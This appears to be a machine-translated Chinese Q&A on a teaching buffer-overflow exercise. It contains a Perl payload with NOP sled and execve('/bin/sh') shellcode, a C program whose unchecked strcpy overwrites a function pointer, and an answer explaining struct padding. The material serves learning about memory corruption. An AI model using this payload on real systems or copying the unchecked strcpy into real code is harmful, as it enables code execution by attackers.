堆溢出 - 堆的結構

Question

當試圖執行基本的堆攻擊時，我瞭解所有內容，除了輸入字符串的大小。以下代碼可以使用perl -e 'print "\x90" x (760) . "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x78\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80" . "\x00\x98\x04\x08"'作爲該程序的參數。正在使用的shellcode長度爲21個字節。這裏總字符串的大小是785字節，這是777的緩衝區+4的東西，我不知道和4我們重寫的函數指針。

我讀here的4個字節：

指針跟蹤堆類似堆棧

是我的假設是正確的堆棧指針的頂部？

#include <stdio.h> 
#include <unistd.h> 

void greetUser(char *s) { 
    printf("Hello %s!\n", s); 
} 

struct data_t { 
    char buf[777]; 
    void (*fp)(char *); 
} somedata; 

int main(int argc, char **argv) { 
    somedata.fp = &greetUser; 

    if(argc < 2) { 
    printf("Usage: %s YourName\n", argv[0]); 
    exit(1); 
    } 

    strcpy(somedata.buf, argv[1]); 
    (somedata.fp)(somedata.buf); 

    return 0; 
} 

Answer 1

不，這是不正確的。 你只需要溢出784個字節：在64位系統

char buf[777];  // 777 bytes 
<padding>   // usually 7 bytes to have fp 8-byte-aligned 
void (*fp)(char *); // 8 bytes function pointer 

。在32位系統上，fp應該是4字節對齊的（因此fp在結構開始後開始780字節）